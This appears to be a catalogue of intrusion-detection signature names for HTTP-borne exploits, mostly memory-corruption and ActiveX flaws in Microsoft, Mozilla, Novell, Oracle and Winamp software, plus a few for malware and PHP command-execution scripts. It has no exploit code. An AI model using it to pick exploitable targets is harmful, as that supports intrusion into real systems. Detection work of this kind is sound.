HTTP_SS-Microsoft-Excel-File-Handling-Code-Execution-Vulnerability
HTTP_SS-Microsoft-Excel-File-Importing-Code-Execution
HTTP_SS-Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262
HTTP_SS-Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow
HTTP_SS-Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
HTTP_SS-Microsoft-Excel-Heap-Corruption-Vulnerability
HTTP_SS-Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098
HTTP_SS-Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273
HTTP_SS-Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097
HTTP_SS-Microsoft-Excel-Linked-List-Corruption-Vulnerability-CVE-2011-0979
HTTP_SS-Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution
HTTP_SS-Microsoft-Excel-Malformed-Record-Memory-Corruption
HTTP_SS-Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261
HTTP_SS-Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260
HTTP_SS-Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275
HTTP_SS-Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237
HTTP_SS-Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption
HTTP_SS-Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274
HTTP_SS-Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability
HTTP_SS-Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption
HTTP_SS-Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240
HTTP_SS-Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257
HTTP_SS-Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230
HTTP_SS-Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101
HTTP_SS-Microsoft-Excel-Rept-Function-Integer-Overflow
HTTP_SS-Microsoft-Excel-Style-Record-Data-Handling-Code-Execution
HTTP_SS-Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
HTTP_SS-Microsoft-Excel-Use-After-Free-WriteAV-Vulnerability
HTTP_SS-Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278
HTTP_SS-Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213
HTTP_SS-Microsoft-GDI-Vulnerability-CVE-2009-2501
HTTP_SS-Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow
HTTP_SS-Microsoft-Help-Centre-Malformed-Escape-Sequence
HTTP_SS-Microsoft-Help-Centre-Protocol-Access
HTTP_SS-Microsoft-HtmlDlgHelper-ActiveX-Component-Usage
HTTP_SS-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution
HTTP_SS-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure
HTTP_SS-Microsoft-Internet-Explorer-CElement-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption-Exploit
HTTP_SS-Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting
HTTP_SS-Microsoft-Internet-Explorer-Cross-Domain-Disclosure-CVE-2010-3330
HTTP_SS-Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243
HTTP_SS-Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324
HTTP_SS-Microsoft-Internet-Explorer-CSS-Strings-Parsing-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971
HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-2
HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-3
HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-4
HTTP_SS-Microsoft-Internet-Explorer-Data-Stream-Handling-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Datasource-Xml-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Developer-Tools-CVE-2011-0811
HTTP_SS-Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution
HTTP_SS-Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting
HTTP_SS-Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251
HTTP_SS-Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254
HTTP_SS-Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption
HTTP_SS-Microsoft-Internet-Explorer-History.go-Method-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345
HTTP_SS-Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow
HTTP_SS-Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560
HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248
HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340
HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343
HTTP_SS-Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918
HTTP_SS-Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Invalid-Pointer-Reference
HTTP_SS-Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
HTTP_SS-Microsoft-Internet-Explorer-IsComponentInstalled-BOF
HTTP_SS-Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245
HTTP_SS-Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
HTTP_SS-Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250
HTTP_SS-Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting
HTTP_SS-Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917
HTTP_SS-Microsoft-Internet-Explorer-Memory-Corruption-CVE-2010-0244
HTTP_SS-Microsoft-Internet-Explorer-MSHTML-CSS-Buffer-Overflow
HTTP_SS-Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability
HTTP_SS-Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345
HTTP_SS-Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Object-Tag-Slash-Buffer-Overflow
HTTP_SS-Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free
HTTP_SS-Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution
HTTP_SS-Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257
HTTP_SS-Microsoft-Internet-Explorer-Redirect-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762
HTTP_SS-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow
HTTP_SS-Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257
HTTP_SS-Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
HTTP_SS-Microsoft-Internet-Explorer-Time-Element-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
HTTP_SS-Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252
HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2530
HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2531
HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328
HTTP_SS-Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
HTTP_SS-Microsoft-Internet-Explorer-Url-Validation
HTTP_SS-Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation
HTTP_SS-Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
HTTP_SS-Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962-2
HTTP_SS-Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266
HTTP_SS-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow
HTTP_SS-Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method
HTTP_SS-Microsoft-JScript-Scripting-Engine-Remote-Code-Execution
HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
HTTP_SS-Microsoft-Local-Troubleshooter-ActiveX-Control-Buffer-Overflow
HTTP_SS-Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
HTTP_SS-Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814
HTTP_SS-Microsoft-Office-Art-Drawing-Records-CVE-2010-3334
HTTP_SS-Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335
HTTP_SS-Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution
HTTP_SS-Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow
HTTP_SS-Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow
HTTP_SS-Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution
HTTP_SS-Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow
HTTP_SS-Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
HTTP_SS-Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
HTTP_SS-Microsoft-Office-Excel-Object-Record-Corruption
HTTP_SS-Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption
HTTP_SS-Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution
HTTP_SS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
HTTP_SS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
HTTP_SS-Microsoft-Office-Excel-String-Variable-Code-Execution
HTTP_SS-Microsoft-Office-Excel-Sxdb-Memory-Corruption
HTTP_SS-Microsoft-Office-Excel-SxView-Memory-Corruption
HTTP_SS-Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245
HTTP_SS-Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution
HTTP_SS-Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption
HTTP_SS-Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
HTTP_SS-Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951
HTTP_SS-Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow
HTTP_SS-Microsoft-Office-MSO-Buffer-Overflow
HTTP_SS-Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336
HTTP_SS-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service
HTTP_SS-Microsoft-Office-OneNote-Url-Validation-Error
HTTP_SS-Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution
HTTP_SS-Microsoft-Office-Pict-Image-Converter-Integer-Overflow
HTTP_SS-Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
HTTP_SS-Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
HTTP_SS-Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution
HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
HTTP_SS-Microsoft-Office-Publisher-Invalid-Memory-Reference
HTTP_SS-Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333
HTTP_SS-Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
HTTP_SS-Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947
HTTP_SS-Microsoft-Office-Web-Components-2-MS09-043
HTTP_SS-Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
HTTP_SS-Microsoft-Office-Web-Components-Code-Execution-Exploit-MS09-043
HTTP_SS-Microsoft-Office-Web-Components-Datasource-Code-Execution
HTTP_SS-Microsoft-Office-Web-Components-MS09-043
HTTP_SS-Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow
HTTP_SS-Microsoft-Office-Word-File-Fib-Processing-Memory-Corruption
HTTP_SS-Microsoft-Office-Word-Sprmcmajority-Record-Buffer-Overflow
HTTP_SS-Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow
HTTP_SS-Microsoft-OLE-Automation-Heap-Overrun
HTTP_SS-Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
HTTP_SS-Microsoft-OLE-Structured-Storage-Excessive-SAT-Size
HTTP_SS-Microsoft-OLE-Structured-Storage-File-Download
HTTP_SS-Microsoft-OLE-Structured-Storage-Suspicious-File-Download
HTTP_SS-Microsoft-Outlook-SMB-Msg-Attachment
HTTP_SS-Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow
HTTP_SS-Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
HTTP_SS-Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability
HTTP_SS-Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
HTTP_SS-Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
HTTP_SS-Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability
HTTP_SS-Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269
HTTP_SS-Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269
HTTP_SS-Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution
HTTP_SS-Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow
HTTP_SS-Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption
HTTP_SS-Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955
HTTP_SS-Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow
HTTP_SS-Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569
HTTP_SS-Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
HTTP_SS-Microsoft-Scriptlet-ActiveX-Component-Usage
HTTP_SS-Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability
HTTP_SS-Microsoft-Silverlight-Pointer-Handling-Memory-Corruption
HTTP_SS-Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption
HTTP_SS-Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow
HTTP_SS-Microsoft-VBA6-Stack-Memory-Corruption
HTTP_SS-Microsoft-Video-ActiveX-Buffer-Overflow-MS09-037-Malicious-Gif
HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
HTTP_SS-Microsoft-Visio-DXF-File-Handling-Code-Execution
HTTP_SS-Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow
HTTP_SS-Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing
HTTP_SS-Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
HTTP_SS-Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption
HTTP_SS-Microsoft-Visual-Basic-Vb6stkiy.dll-ActiveX-Control-BOF
HTTP_SS-Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-Buffer-Overflow
HTTP_SS-Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF
HTTP_SS-Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution
HTTP_SS-Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption
HTTP_SS-Microsoft-Visual-Studio-Project-Name-BOF
HTTP_SS-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption
HTTP_SS-Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027
HTTP_SS-Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249
HTTP_SS-Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow
HTTP_SS-Microsoft-Windows-Cinepak-Codec-Code-Execution
HTTP_SS-Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow
HTTP_SS-Microsoft-Windows-DVR-MS-CVE-2011-0042
HTTP_SS-Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption
HTTP_SS-Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow
HTTP_SS-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow
HTTP_SS-Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
HTTP_SS-Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
HTTP_SS-Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow
HTTP_SS-Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow
HTTP_SS-Microsoft-Windows-Graphics-Rendering-Engine-VML-Negative-Focussize
HTTP_SS-Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF
HTTP_SS-Microsoft-Windows-Help-Facility-ActiveX-Control-Buffer-Overflow
HTTP_SS-Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
HTTP_SS-Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-JPEG
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sig
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Spread
HTTP_SS-Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sum
HTTP_SS-Microsoft-Windows-Media-Playback-Memory-Corruption
HTTP_SS-Microsoft-Windows-Messenger-ActiveX-Control-CVE-2011-1243
HTTP_SS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
HTTP_SS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-2
HTTP_SS-Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution
HTTP_SS-Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow
HTTP_SS-Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow
HTTP_SS-Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow
HTTP_SS-Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow
HTTP_SS-Microsoft-Windows-Scripting-Engine-Information-Disclosure-CVE-2011-0031
HTTP_SS-Microsoft-Windows-Search-Protocol-Handler-Command-Execution
HTTP_SS-Microsoft-Windows-VBScript-Help-File-Code-Execution
HTTP_SS-Microsoft-Windows-VBScript-Help-File-Code-Execution-2
HTTP_SS-Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow
HTTP_SS-Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow
HTTP_SS-Microsoft-WMI-Administrative-Tools-ActiveX-Control
HTTP_SS-Microsoft-WMITools-ActiveX-Control-CVE-2010-3973
HTTP_SS-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption
HTTP_SS-Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow
HTTP_SS-Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow
HTTP_SS-Microsoft-Word-File-Information-Memory-Corruption-MS09-068
HTTP_SS-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption
HTTP_SS-Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
HTTP_SS-Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability
HTTP_SS-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow
HTTP_SS-Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
HTTP_SS-Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
HTTP_SS-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
HTTP_SS-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption-DOS
HTTP_SS-Microsoft-WordPad-Text-Converter-Buffer-Overflow
HTTP_SS-Microsoft-WordPad-Text-Converter-CVE-2010-2563
HTTP_SS-Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow
HTTP_SS-Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF
HTTP_SS-Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt
HTTP_SS-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution
HTTP_SS-Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
HTTP_SS-Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure
HTTP_SS-Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280
HTTP_SS-Microsoft-XMLHTTP-ActiveX-Control-Code-Execution
HTTP_SS-Mime-Formatted-Request-Vulnerability-CVE-2011-1894
HTTP_SS-mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow
HTTP_SS-Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption
HTTP_SS-Mozilla-CSS-Border-Memory-Corruption
HTTP_SS-Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow
HTTP_SS-Mozilla-Firefox-Browser-Engine-Memory-Corruption
HTTP_SS-Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption
HTTP_SS-Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
HTTP_SS-Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption-2
HTTP_SS-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution
HTTP_SS-Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption
HTTP_SS-Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption
HTTP_SS-Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow
HTTP_SS-Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption
HTTP_SS-Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption
HTTP_SS-Mozilla-Firefox-nsTreeRange-Use-After-Free
HTTP_SS-Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
HTTP_SS-Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer
HTTP_SS-Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption
HTTP_SS-Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption
HTTP_SS-Mozilla-Firefox-Unicode-Data-Denial-Of-Service
HTTP_SS-Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow
HTTP_SS-Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow
HTTP_SS-Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption
HTTP_SS-Mozilla-JavaScript-String-Replace-Buffer-Overflow
HTTP_SS-Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow
HTTP_SS-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption
HTTP_SS-Mozilla-Products-Malformed-Gif-Buffer-Overflow
HTTP_SS-Mozilla-Products-MathML-Integer-Overflow
HTTP_SS-Mozilla-Products-QueryInterface-Method-Memory-Corruption
HTTP_SS-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption
HTTP_SS-Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow
HTTP_SS-Mozilla-SVG-Data-Processing-Memory-Corruption
HTTP_SS-MPlayer-TwinVQ-File-Handling-Buffer-Overflow
HTTP_SS-MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability
HTTP_SS-MS-Internet-Explorer-Select-Element-Remote-Code-Execution
HTTP_SS-Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow
HTTP_SS-Multiple-Vendor-PDF-Reader-Catlog-Handling
HTTP_SS-MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow
HTTP_SS-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow
HTTP_SS-NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow
HTTP_SS-Norton-Internet-Security-2004-Symspam.dll-BOF
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-GetDriverFile-BOF
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-GetPrinterURLList-Buffer-Overflow
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-UploadPrinterDriver-BOF
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-UploadResource-BOF
HTTP_SS-Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow
HTTP_SS-Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow
HTTP_SS-Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow
HTTP_SS-Novell-iPrint-Client-Remote-File-Deletion
HTTP_SS-Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow
HTTP_SS-Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow
HTTP_SS-Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow
HTTP_SS-Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow
HTTP_SS-Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow
HTTP_SS-Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-BOF
HTTP_SS-Office-BMP-Integer-Overflow-CVE-2009-2518
HTTP_SS-Oleaut32.dll-Remote-Code-Execution-Vulnerability
HTTP_SS-OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow
HTTP_SS-OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow
HTTP_SS-OpenOffice-TIFF-File-Parsing-Integer-Overflow
HTTP_SS-Opera-Browser-File-URI-Handling-Buffer-Overflow
HTTP_SS-Opera-Suspicious-Preference-Modification
HTTP_SS-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution
HTTP_SS-Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow
HTTP_SS-Oracle-Document-Capture-EasyMail-ActiveX-Control
HTTP_SS-Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-BOF-Exploit
HTTP_SS-Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
HTTP_SS-Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow
HTTP_SS-Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow
HTTP_SS-Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
HTTP_SS-Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow
HTTP_SS-Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow
HTTP_SS-Orbit-Downloader-Url-Processing-Stack-Buffer-Overflow
HTTP_SS-Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow
HTTP_SS-Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow
HTTP_SS-PBot-Malware
HTTP_SS-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS
HTTP_SS-Php-Probe-Script
HTTP_SS-Php-Script-External-Command-Execution-Download
HTTP_SS-Php-Scripting-In-Server-Reply
HTTP_SS-Pidgin-MSN-MSNP2P-Message-Integer-Overflow
HTTP_SS-PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow
